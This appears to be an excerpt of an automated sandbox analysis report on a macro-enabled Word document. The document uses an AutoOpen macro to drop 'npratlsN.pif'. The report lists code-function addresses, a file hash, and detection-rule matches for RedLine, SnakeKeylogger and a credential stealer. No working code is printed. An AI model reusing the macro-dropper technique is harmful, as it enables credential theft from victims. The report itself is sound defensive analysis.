Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A83240	13_2_20A83240
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A80040	13_2_20A80040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A83BA0	13_2_20A83BA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A809A0	13_2_20A809A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A85180	13_2_20A85180
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A81F80	13_2_20A81F80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A841E0	13_2_20A841E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A80FE0	13_2_20A80FE0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A857C0	13_2_20A857C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A825C0	13_2_20A825C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A82F20	13_2_20A82F20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A8F108	13_2_20A8F108
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A84500	13_2_20A84500
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A81300	13_2_20A81300
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A83560	13_2_20A83560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A80360	13_2_20A80360
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A84B40	13_2_20A84B40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A81940	13_2_20A81940
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE0040	13_2_20BE0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE2338	13_2_20BE2338
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE0740	13_2_20BE0740
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE2A38	13_2_20BE2A38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE0E38	13_2_20BE0E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE5218	13_2_20BE5218
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE1538	13_2_20BE1538
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE371C	13_2_20BE371C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE1C38	13_2_20BE1C38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE0006	13_2_20BE0006
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE2328	13_2_20BE2328
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE0730	13_2_20BE0730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE2A29	13_2_20BE2A29
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE0E28	13_2_20BE0E28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE1537	13_2_20BE1537
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20BE1C29	13_2_20BE1C29
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_2129BDF8	13_2_2129BDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_21291BAC	13_2_21291BAC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_21294D20	13_2_21294D20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00408C60	13_1_00408C60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_0040DC11	13_1_0040DC11
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00407C3F	13_1_00407C3F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00418CCC	13_1_00418CCC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00406CA0	13_1_00406CA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_004028B0	13_1_004028B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_0041A4BE	13_1_0041A4BE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00418244	13_1_00418244
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00401650	13_1_00401650
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00402F20	13_1_00402F20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_004193C4	13_1_004193C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00418788	13_1_00418788
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00402F89	13_1_00402F89
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00402B90	13_1_00402B90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_004073A0	13_1_004073A0
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_028120C4	14_2_028120C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_3_307A9CBE	15_3_307A9CBE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00408C60	15_2_00408C60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_0040DC11	15_2_0040DC11
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00407C3F	15_2_00407C3F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00418CCC	15_2_00418CCC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00406CA0	15_2_00406CA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_004028B0	15_2_004028B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_0041A4BE	15_2_0041A4BE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00418244	15_2_00418244
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00401650	15_2_00401650
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00402F20	15_2_00402F20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_004193C4	15_2_004193C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00418788	15_2_00418788
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00402F89	15_2_00402F89
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00402B90	15_2_00402B90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_004073A0	15_2_004073A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_2D3C1560	15_2_2D3C1560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_2D3C12B3	15_2_2D3C12B3
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_2D3C12C0	15_2_2D3C12C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FC040	15_2_305FC040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FF0C9	15_2_305FF0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FB1E1	15_2_305FB1E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F41E1	15_2_305F41E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F5310	15_2_305F5310
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FD490	15_2_305FD490
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FB4BF	15_2_305FB4BF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FB7A2	15_2_305FB7A2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F88A1	15_2_305F88A1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FAA58	15_2_305FAA58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FBA81	15_2_305FBA81
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FBD5F	15_2_305FBD5F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F8F18	15_2_305F8F18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FAF00	15_2_305FAF00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F5FA8	15_2_305F5FA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FD481	15_2_305FD481
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FE5D8	15_2_305FE5D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FE5E8	15_2_305FE5E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F2B0E	15_2_305F2B0E
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F2BA5	15_2_305F2BA5
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F1C54	15_2_305F1C54
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305FAC20	15_2_305FAC20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_305F2E09	15_2_305F2E09
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B8550	15_2_317B8550
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B3508	15_2_317B3508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BEDF8	15_2_317BEDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B2DB1	15_2_317B2DB1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B0040	15_2_317B0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B7808	15_2_317B7808
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B0738	15_2_317B0738
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B0E38	15_2_317B0E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BB574	15_2_317BB574
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BE548	15_2_317BE548
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BE541	15_2_317BE541
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B8540	15_2_317B8540
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BEDE9	15_2_317BEDE9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BB9D8	15_2_317BB9D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BB9C8	15_2_317BB9C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BE9A0	15_2_317BE9A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BE991	15_2_317BE991
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BB580	15_2_317BB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B7071	15_2_317B7071
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BD840	15_2_317BD840
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BD830	15_2_317BD830
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B0024	15_2_317B0024
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B34F8	15_2_317B34F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BE0F0	15_2_317BE0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BE0E1	15_2_317BE0E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BDC98	15_2_317BDC98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BDC88	15_2_317BDC88
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B7080	15_2_317B7080
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BCB38	15_2_317BCB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B072C	15_2_317B072C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BCB2C	15_2_317BCB2C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BFB00	15_2_317BFB00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BD3E8	15_2_317BD3E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BD3DD	15_2_317BD3DD
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BCF90	15_2_317BCF90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BCF80	15_2_317BCF80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BC27C	15_2_317BC27C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BF250	15_2_317BF250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BF240	15_2_317BF240
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BBE30	15_2_317BBE30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B7A28	15_2_317B7A28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317B0E2D	15_2_317B0E2D
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BBE20	15_2_317BBE20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BFAF4	15_2_317BFAF4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BC6E0	15_2_317BC6E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_317BC6D0	15_2_317BC6D0

Source: PI ITS15235 (2).doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen			Name: AutoOpen

Source: PI ITS15235 (2).doc

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\npratlsN.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C

Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: String function: 0040E1D8 appears 132 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 02784860 appears 943 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 02784500 appears 34 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 027846D4 appears 244 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 02798818 appears 56 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 0279889C appears 45 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 027844DC appears 74 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 02828818 appears 50 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 02814860 appears 677 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 028146D4 appears 155 times

Source: NETUTILS.dll.7.dr

Static PE information: Number of sections : 19 > 10

Source: 17.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.Nsltarpn.PIF.20f567a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
